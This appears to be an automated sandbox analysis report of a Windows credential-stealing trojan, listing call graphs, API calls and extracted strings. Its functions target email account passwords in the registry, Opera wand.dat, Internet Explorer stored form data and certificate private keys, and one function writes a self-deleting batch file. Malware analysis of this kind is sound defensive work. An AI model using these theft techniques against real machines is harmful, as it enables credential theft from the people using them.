11403 4018b8 LocalFree 11400->11403 11405 40e0fe 11400->11405 11401->11400 11402->11400 11403->11400 11406 401f36 2 API calls 11405->11406 11407 40e10d 11406->11407 11408 40e111 11407->11408 11409 401ffd 7 API calls 11407->11409 11408->11400 11410 40e122 11409->11410 11411 40e230 11410->11411 11425 4018cf LocalAlloc 11410->11425 11411->11400 11413 40e14b StrStrA 11414 40e15f lstrlen StrStrA 11413->11414 11416 40e15a 11413->11416 11415 40e184 lstrlen 11414->11415 11414->11416 11423 40e132 11415->11423 11418 4018b8 LocalFree 11416->11418 11417 402a1d 3 API calls 11417->11423 11419 40e227 11418->11419 11421 4018b8 LocalFree 11421->11423 11422 4043dc 2 API calls 11422->11423 11423->11413 11423->11416 11423->11417 11423->11421 11423->11422 11424 4015cb lstrlen 11423->11424 11424->11423 11425->11423 11427 401eb1 7 API calls 11426->11427 11428 405df3 11427->11428 11429 405e45 11428->11429 11430 401e4c 6 API calls 11428->11430 11429->9808 11431 405e02 11430->11431 11432 404351 41 API calls 11431->11432 11433 405e18 11432->11433 11434 404351 41 API calls 11433->11434 11435 405e2c 11434->11435 11436 404351 41 API calls 11435->11436 11437 405e40 11436->11437 11438 4018b8 LocalFree 11437->11438 11438->11429 11456 4018cf LocalAlloc 11439->11456 11441 40ea0c RegOpenKeyA 11442 40eb34 11441->11442 11453 40ea29 11441->11453 11443 4018b8 LocalFree 11442->11443 11445 40eb3f 11443->11445 11444 40ea30 RegEnumKeyExA 11446 40ea59 RegCloseKey 11444->11446 11444->11453 11445->9824 11446->11442 11448 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11448->11453 11449 401d71 6 API calls 11449->11453 11450 401df8 5 API calls 11452 40eaba GetPrivateProfileStringA 11450->11452 11451 40e9f9 45 API calls 11451->11453 11452->11453 11453->11444 11453->11448 11453->11449 11453->11450 11453->11451 11454 4018b8 LocalFree 11453->11454 11455 404351 41 API calls 11453->11455 11454->11453 11455->11453 11456->11441 11458 401eb1 7 API calls 11457->11458 11459 408c2c 11458->11459 11460 408c3f 11459->11460 11487 408ae5 11459->11487 11460->9832 11463 4018b8 LocalFree 11463->11460 11465 408980 11464->11465 11468 40897b 11464->11468 11466 4018b8 LocalFree 11465->11466 11467 408ae1 11466->11467 11467->9846 11468->11465 11469 4089a0 11468->11469 11470 408991 11468->11470 11471 401df8 5 API calls 11469->11471 11472 401df8 5 API calls 11470->11472 11473 40899e 11471->11473 11472->11473 11488 408aff 11487->11488 11489 408b04 11487->11489 11488->11489 11491 401df8 5 API calls 11488->11491 11490 4018b8 LocalFree 11489->11490 11492 408c1d 11490->11492 11493 408b16 11491->11493 11492->11463 11494 408b2d FindFirstFileA 11493->11494 11494->11489 11499 408b4c 11494->11499 11495 408bed FindNextFileA 11497 408c07 FindClose 11495->11497 11495->11499 11496 408b5e lstrcmpiA 11498 408b78 lstrcmpiA 11496->11498 11496->11499 11497->11489 11498->11499 11499->11495 11499->11496 11500 401df8 5 API calls 11499->11500 11501 401e4c 6 API calls 11499->11501 11500->11499 11502 408bba StrStrIA 11501->11502 11503 408bd5 11502->11503 11504 408be8 11502->11504 11505 408961 38 API calls 11503->11505 11506 4018b8 LocalFree 11504->11506 11505->11504 11506->11495 11593 401eb1 7 API calls 11592->11593 11594 405328 11593->11594 11595 4053bf 11594->11595 11596 401df8 5 API calls 11594->11596 11595->9868 11597 405340 11596->11597 11598 4051e3 29 API calls 11597->11598 11599 40534f 11598->11599 11600 4018b8 LocalFree 11599->11600 11601 405354 11600->11601 11602 401df8 5 API calls 11601->11602 11603 405361 11602->11603 11604 4051e3 29 API calls 11603->11604 11605 405370 11604->11605 11606 4018b8 LocalFree 11605->11606 11607 405375 11606->11607 11622 401d71 6 API calls 11621->11622 11624 4051bd 11622->11624 11623 4051df 11623->9878 11624->11623 11625 4018b8 LocalFree 11624->11625 11625->11623 11627 405202 11626->11627 11628 4051fd 11626->11628 11629 4018b8 LocalFree 11627->11629 11628->11627 11630 401df8 5 API calls 11628->11630 11631 405316 11629->11631 11632 405212 11630->11632 11631->9862 11650 405182 11632->11650 11635 4018b8 LocalFree 11636 405221 11635->11636 11637 401df8 5 API calls 11636->11637 11638 40522e 11637->11638 11639 405245 FindFirstFileA 11638->11639 11639->11627 11640 405264 11639->11640 11641 405272 lstrcmpiA 11640->11641 11642 4052e6 FindNextFileA 11640->11642 11643 40528a 11641->11643 11644 40528c lstrcmpiA 11641->11644 11642->11640 11645 405300 FindClose 11642->11645 11643->11642 11646 401df8 5 API calls 11643->11646 11647 401e4c 6 API calls 11643->11647 11648 405182 16 API calls 11643->11648 11649 4018b8 LocalFree 11643->11649 11644->11643 11645->11627 11646->11643 11647->11643 11648->11643 11649->11642 11651 40406c 16 API calls 11650->11651 11652 405195 11651->11652 11652->11635 11654 40f3a8 11653->11654 11660 40f329 11653->11660 11654->9902 11655 40f330 RegEnumKeyExA 11656 40f359 RegCloseKey 11655->11656 11655->11660 11656->11654 11658 401df8 5 API calls 11658->11660 11659 401e4c 6 API calls 11659->11660 11660->11655 11660->11658 11660->11659 11662 4018b8 LocalFree 11660->11662 11673 40f178 11660->11673 11662->11660 11664 40f452 11663->11664 11671 40f3cc 11663->11671 11664->9906 11665 40f3d3 RegEnumKeyExA 11666 40f3fc RegCloseKey 11665->11666 11665->11671 11666->11664 11668 401df8 5 API calls 11668->11671 11669 401e4c 6 API calls 11669->11671 11670 40f30d 23 API calls 11670->11671 11671->11665 11671->11668 11671->11669 11671->11670 11672 4018b8 LocalFree 11671->11672 11672->11671 11675 40f188 11673->11675 11674 401d71 6 API calls 11674->11675 11675->11674 11678 4018b8 LocalFree 11675->11678 11680 40f1c4 11675->11680 11692 40f12e 11675->11692 11677 401d71 6 API calls 11677->11680 11678->11675 11679 40f21b 11681 401d71 6 API calls 11679->11681 11683 4018b8 LocalFree 11679->11683 11686 4043dc 2 API calls 11679->11686 11688 40f12e 6 API calls 11679->11688 11690 40f29c 11679->11690 11680->11677 11680->11679 11682 4015cb lstrlen 11680->11682 11684 4018b8 LocalFree 11680->11684 11681->11679 11682->11680 11683->11679 11684->11680 11685 401d71 6 API calls 11685->11690 11686->11679 11687 40f2f3 11687->11660 11688->11679 11689 4015cb lstrlen 11689->11690 11690->11685 11690->11687 11690->11689 11691 4018b8 LocalFree 11690->11691 11691->11690 11701 402abb 11692->11701 11694 40f13f 11695 4015cb lstrlen 11694->11695 11700 40f16f 11694->11700 11696 40f15c 11695->11696 11697 4015cb lstrlen 11696->11697 11698 40f167 11697->11698 11699 4018b8 LocalFree 11698->11699 11699->11700 11700->11675 11702 402ac4 11701->11702 11703 402aca 11701->11703 11702->11703 11704 402ad0 IsTextUnicode 11702->11704 11703->11694 11705 402af1 11704->11705 11706 402ae1 11704->11706 11720 4018cf LocalAlloc 11705->11720 11710 402a3e 11706->11710 11709 402aef 11709->11694 11711 402a52 WideCharToMultiByte 11710->11711 11712 402a4b 11710->11712 11713 402a6f 11711->11713 11719 402aa1 11711->11719 11712->11709 11721 4018cf LocalAlloc 11713->11721 11715 402a7a 11716 402a7e WideCharToMultiByte 11715->11716 11715->11719 11717 402a9b 11716->11717 11716->11719 11719->11709 11720->11709 11721->11715

                  Executed Functions

                  Function 00410065 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 158stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetTickCount.KERNEL32 ref: 00410092
                  • wsprintfA.USER32 ref: 004100A0
                  • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410100
                  • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,00410079), ref: 00410116
                  • lstrcat.KERNEL32(?,?), ref: 0041012A
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 00410143
                  • lstrcpy.KERNEL32(?,?), ref: 0041015A
                  • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 00410166
                  • lstrcpy.KERNEL32(00000001,?), ref: 00410174
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                  • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                  • API String ID: 629621046-4169620016
                  • Opcode ID: 385ba1abc110945cb0f9bf7ed72dd57197ca6cb99058a34aa07d24b2a2388ffa
                  • Instruction ID: bbe99b2e40bcb5cc72a16337b87bb18ba9769970c46c0502ba3b244b455d0a69
                  • Opcode Fuzzy Hash: 385ba1abc110945cb0f9bf7ed72dd57197ca6cb99058a34aa07d24b2a2388ffa
                  • Instruction Fuzzy Hash: A0415430B942057BDF1576A18C03FEE7AA7AB85704F24843A7614F62E1DDF94DD0961C
                  Function 0040EBA3 Relevance: 22.9, APIs: 3, Strings: 10, Instructions: 174registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040EBB6
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EBEA
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EEA5
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                  • API String ID: 1332880857-2111798378
                  • Opcode ID: 05c872853d89018179e56d9162724d5ad08c6549d31a9722be98787650cef169
                  • Instruction ID: e6b8c2f4079cbe2db776dc2cebf65675c25a341e0b4d5db889414e5afc04ff2d
                  • Opcode Fuzzy Hash: 05c872853d89018179e56d9162724d5ad08c6549d31a9722be98787650cef169
                  • Instruction Fuzzy Hash: A471943194011CAADF226F51CC02FED7AB6BF04704F1485BAB558750B1DB7A5BA1AF88
                  Function 0040D3BE Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 142encryptionstringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 250 40d3be-40d3dc call 4015f0 253 40d3e2-40d3e9 250->253 254 40d5af-40d5bd call 401636 250->254 253->254 256 40d3ef-40d3f6 253->256 256->254 258 40d3fc-40d403 256->258 258->254 259 40d409-40d410 258->259 259->254 260 40d416-40d41d 259->260 260->254 261 40d423-40d42a 260->261 261->254 262 40d430-40d437 261->262 262->254 263 40d43d-40d451 CertOpenSystemStoreA 262->263 263->254 264 40d457 263->264 265 40d459-40d467 CertEnumCertificatesInStore 264->265 266 40d469-40d5a9 CertCloseStore 265->266 267 40d46e-40d47c 265->267 266->254 269 40d482 267->269 270 40d59f 267->270 271 40d595-40d599 269->271 270->265 271->270 272 40d487-40d495 lstrcmp 271->272 273 40d49b-40d49f 272->273 274 40d58f-40d592 272->274 273->274 275 40d4a5-40d4cd call 4018cf call 401906 lstrcmp 273->275 274->271 280 40d4d3-40d4ea CryptAcquireCertificatePrivateKey 275->280 281 40d587-40d58a call 4018b8 275->281 280->281 282 40d4f0-40d502 CryptGetUserKey 280->282 281->274 284 40d504-40d51b CryptExportKey 282->284 285 40d57c-40d581 CryptReleaseContext 282->285 286 40d573-40d576 CryptDestroyKey 284->286 287 40d51d-40d540 call 4018cf CryptExportKey 284->287 285->281 286->285 290 40d542-40d566 call 401569 call 40159f * 2 287->290 291 40d56b-40d56e call 4018b8 287->291 290->291 291->286
                  APIs
                  • CertOpenSystemStoreA.CRYPT32(00000000,0041686B), ref: 0040D444
                  • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D45D
                  • lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D48E
                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                  • lstrcmp.KERNEL32(?,00416878), ref: 0040D4C6
                  • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D4E2
                  • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D4FA
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D513
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D538
                  • CryptDestroyKey.ADVAPI32(?), ref: 0040D576
                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D581
                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D5A9
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                  • String ID: 2.5.29.37
                  • API String ID: 2649496969-3842544949
                  • Opcode ID: ae199dad05ffd2d656b1fff598cd8733706a88330e2e2fe71924447f7fbef6cd
                  • Instruction ID: 4627d1032078a7020cf6d62532d0161f5819a66d9f9987796914407ab25e48c3
                  • Opcode Fuzzy Hash: ae199dad05ffd2d656b1fff598cd8733706a88330e2e2fe71924447f7fbef6cd
                  • Instruction Fuzzy Hash: 50514931900209BADF21AB90DC0AFEEBA76AF44349F148436FA01751F0C779AA94DB58
                  Function 00404E73 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107filestringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 298 404e73-404e8b 299 404e92 298->299 300 404e8d-404e90 298->300 302 404ff0-404ffc call 4018b8 299->302 300->299 301 404e97-404ea1 call 4025a9 300->301 307 404eb2-404eba call 401df8 301->307 308 404ea3-404eb0 call 401df8 301->308 312 404ebf-404eef call 4018e6 FindFirstFileA 307->312 308->312 312->302 315 404ef5-404f01 312->315 316 404f03-404f13 lstrcmpiA 315->316 317 404f68-404f83 StrStrIA 315->317 320 404f15 316->320 321 404f1a-404f30 lstrcmpiA 316->321 318 404f85-404fa4 call 401df8 call 401e4c 317->318 319 404fcb-404fdf FindNextFileA 317->319 333 404fb3 318->333 334 404fa6-404fb1 StrStrIA 318->334 319->315 322 404fe5-404feb FindClose 319->322 320->319 324 404f32 321->324 325 404f37-404f66 call 401df8 call 401e4c call 404e73 call 4018b8 321->325 322->302 324->319 325->319 336 404fb8-404fbb 333->336 334->336 338 404fc6 call 4018b8 336->338 339 404fbd-404fc1 call 404e5c 336->339 338->319 339->338
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00404EE3
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00404F0C
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00404F29
                  • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404FD8
                  • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404FEB
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$.ini$Sites\$\*.*
                  • API String ID: 3040542784-999409347
                  • Opcode ID: fe6739dd0c4f80b05f800ac37b6e33aa946d2008265589ac841af6840cfd1950
                  • Instruction ID: 2941bf432101725d70f5757804a4ebc5995094765b8e32c852607719a5cea155
                  • Opcode Fuzzy Hash: fe6739dd0c4f80b05f800ac37b6e33aa946d2008265589ac841af6840cfd1950
                  • Instruction Fuzzy Hash: 8D3163B090020AAADF11BF61CC42BEE77A9AF80304F1045B7F518B51E1D77C9EC1AE99
                  Function 004045FD Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • GetVersionExA.KERNEL32(0000009C), ref: 00404646
                  • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046CB
                  • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004046F4
                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047A9
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004047C8
                  • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047D8
                  • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 004047E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                  • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                  • API String ID: 1787888500-92997708
                  • Opcode ID: 98922111a5c18bbd0df1221ed014f99984a947c09b0d63f2c567c8149e73ab3a
                  • Instruction ID: 7c31074f632134472dcc05d9285869f9d737ea1e12c753ccd0a87b8a6cf53fef
                  • Opcode Fuzzy Hash: 98922111a5c18bbd0df1221ed014f99984a947c09b0d63f2c567c8149e73ab3a
                  • Instruction Fuzzy Hash: E1518671A00218BEEF217B61CC42F9D7A35AF81308F0040BBB649790E1D7B95ED19F5A
                  Function 00408AE5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00408B3A
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00408B6D
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00408B87
                  • StrStrIA.SHLWAPI(?,opera,00000000,00414F80,?,00414F7E,?,00000000,?), ref: 00408BCC
                  • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 00408BFA
                  • FindClose.KERNEL32(?,?,?,00000000,?), ref: 00408C0D
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*$opera$wand.dat
                  • API String ID: 3663067366-3278183560
                  • Opcode ID: 73ad6621732fd5b1b0d074b55d3e0368f0f7d044ebe32a021b5e90eea4881bd2
                  • Instruction ID: 14270bf5f4a6befa3cb4d8c9ad3f9c77aab47d29b5d3902e72099351859ebbb7
                  • Opcode Fuzzy Hash: 73ad6621732fd5b1b0d074b55d3e0368f0f7d044ebe32a021b5e90eea4881bd2
                  • Instruction Fuzzy Hash: AC312DB090021DAAEF20AB61CD42AE977B5AB44304F0041FBF548B91E1DB78AFC1DF58
                  Function 004041A6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00404216
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00404243
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 00404260
                  • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 0040432A
                  • FindClose.KERNEL32(?,?,?,?,00000000,00000000,?), ref: 0040433D
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                  • String ID: *.*$\*.*
                  • API String ID: 3040542784-1692270452
                  • Opcode ID: 7c054c62878c98a29015d5884a0aa70fdad17bcb5f176ccd0d97648684c322da
                  • Instruction ID: 1f47857f422b45aa96da1fbac4a271589fd82444487ea459f7e32dcb795770b9
                  • Opcode Fuzzy Hash: 7c054c62878c98a29015d5884a0aa70fdad17bcb5f176ccd0d97648684c322da
                  • Instruction Fuzzy Hash: DF4160B0600219AADF11AF61CC02AEE3B69AF84344F1041BBFA18750F1D7799AD1EE59
                  Function 0040A712 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?), ref: 0040A71C
                  • wsprintfA.USER32 ref: 0040A79B
                  • lstrlenW.KERNEL32(?,?), ref: 0040A7E1
                  • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A824
                  • LocalFree.KERNEL32(00000000), ref: 0040A85B
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                  • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                  • API String ID: 1926481713-2450551051
                  • Opcode ID: 250aea4bfc7b2763cee397cb85e4685f67c7bdccd712409840bf091a8d311f9b
                  • Instruction ID: 431ada3711b4cbf09e0058f43ea143bd1b8c6f7f7d2024ed2fa74cfcbe70fe6e
                  • Opcode Fuzzy Hash: 250aea4bfc7b2763cee397cb85e4685f67c7bdccd712409840bf091a8d311f9b
                  • Instruction Fuzzy Hash: BF414D72C1021CEADF11AFA5DC41AEDBB79EF04314F14803AF910B61A1D7799A61CB59
                  Function 004051E3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81filestringCOMMON
                  Download Yara Rule
                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 00405252
                  • lstrcmpiA.KERNEL32(00414F7E,?), ref: 00405281
                  • lstrcmpiA.KERNEL32(00414F80,?), ref: 0040529B
                  • FindNextFileA.KERNEL32(?,?,00000000,?,00000000), ref: 004052F3
                  • FindClose.KERNEL32(?,?,?,00000000,?,00000000), ref: 00405306
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Filelstrcmpi$CloseFirstNext
                  • String ID: \*.*
                  • API String ID: 3663067366-1173974218
                  • Opcode ID: 5d1d2cbe2603c696b2231206718f2c189f088ed98083f807d967af521c828ecb
                  • Instruction ID: fe923e12dd3194ffbfaf4ecf458f4b1e8703c939ae74238161610769ba895d74
                  • Opcode Fuzzy Hash: 5d1d2cbe2603c696b2231206718f2c189f088ed98083f807d967af521c828ecb
                  • Instruction Fuzzy Hash: 0C31FB71900219AADF21AB61CC42AEE77A9EF04308F0045BAF818B51E2D7789BD19F59
                  Function 00402968 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 004029A3
                  • GetCurrentProcess.KERNEL32 ref: 004029AD
                  • OpenProcessToken.ADVAPI32(00000000,00000020,00000000), ref: 004029BB
                  • AdjustTokenPrivileges.KERNELBASE(00000000,00000000,?,00000010,00000000,00000000), ref: 004029FD
                  • CloseHandle.KERNEL32(00000000), ref: 00402A11
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                  • String ID:
                  • API String ID: 3038321057-0
                  • Opcode ID: d009cff5696b7f4c186aa4e15d3284577fce5addd6a53109ba68b717834f9f6d
                  • Instruction ID: a219fab04c2577c3fdc3e3711d8b7e1a3bbf213a345a755bd60571ca67a776ce
                  • Opcode Fuzzy Hash: d009cff5696b7f4c186aa4e15d3284577fce5addd6a53109ba68b717834f9f6d
                  • Instruction Fuzzy Hash: 7B1146B1A04209EFEF208F95DD4ABEEBBB4BB40319F108036A151B41D0D7F89A84CF18
                  Function 0041051E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30comCOMMON
                  Download Yara Rule
                  APIs
                  • OleInitialize.OLE32 ref: 0041051E
                  • GetUserNameA.ADVAPI32(?,00000101), ref: 0041056E
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: InitializeNameUser
                  • String ID: NN@ossy008
                  • API String ID: 2272643758-3608549514
                  • Opcode ID: ee0380db7069c618c67f60cd9f8b317b2d1a5a5dc1e0fcd9c8d36bf9dbea60ee
                  • Instruction ID: 411c7702ac14aaa98d60b8154e5b77ccb9639754c5b591c276c5e0f72daf855e
                  • Opcode Fuzzy Hash: ee0380db7069c618c67f60cd9f8b317b2d1a5a5dc1e0fcd9c8d36bf9dbea60ee
                  • Instruction Fuzzy Hash: C1F0FE705542046DDB20BBB2AD076DE39A69B0070CF14443BB858F51E2DAFD45C4EA6D
                  Function 004105D6 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32 ref: 004105D6
                  • RevertToSelf.ADVAPI32 ref: 00410601
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterRevertSelfUnhandled
                  • String ID:
                  • API String ID: 669012916-0
                  • Opcode ID: 0b2dc2319a9a196d111b0c7210b554ee72de698e49fe6a011752dbbcc5a003c6
                  • Instruction ID: 79391622e25d01b2d077cc46aef248b6e0fee1365510e087247757f2e97d9c79
                  • Opcode Fuzzy Hash: 0b2dc2319a9a196d111b0c7210b554ee72de698e49fe6a011752dbbcc5a003c6
                  • Instruction Fuzzy Hash: B1D048789442498AD7757BF6B80A7DC3650ABC074EF80807FA401105AACFFD25D9CD6E
                  Function 0040F984 Relevance: .1, Instructions: 59COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1644343823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_400000_AxgZVzUv8m.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51da6573e3da27ec3b95b0a49ef9c20d22bbf5351cbe70dbe085edc39ec67742
                  • Instruction ID: d5f07a856e824efec72bd6e09ab3cdbbbddd91440c17a4b0cfd9f4b345f0efc4
                  • Opcode Fuzzy Hash: 51da6573e3da27ec3b95b0a49ef9c20d22bbf5351cbe70dbe085edc39ec67742
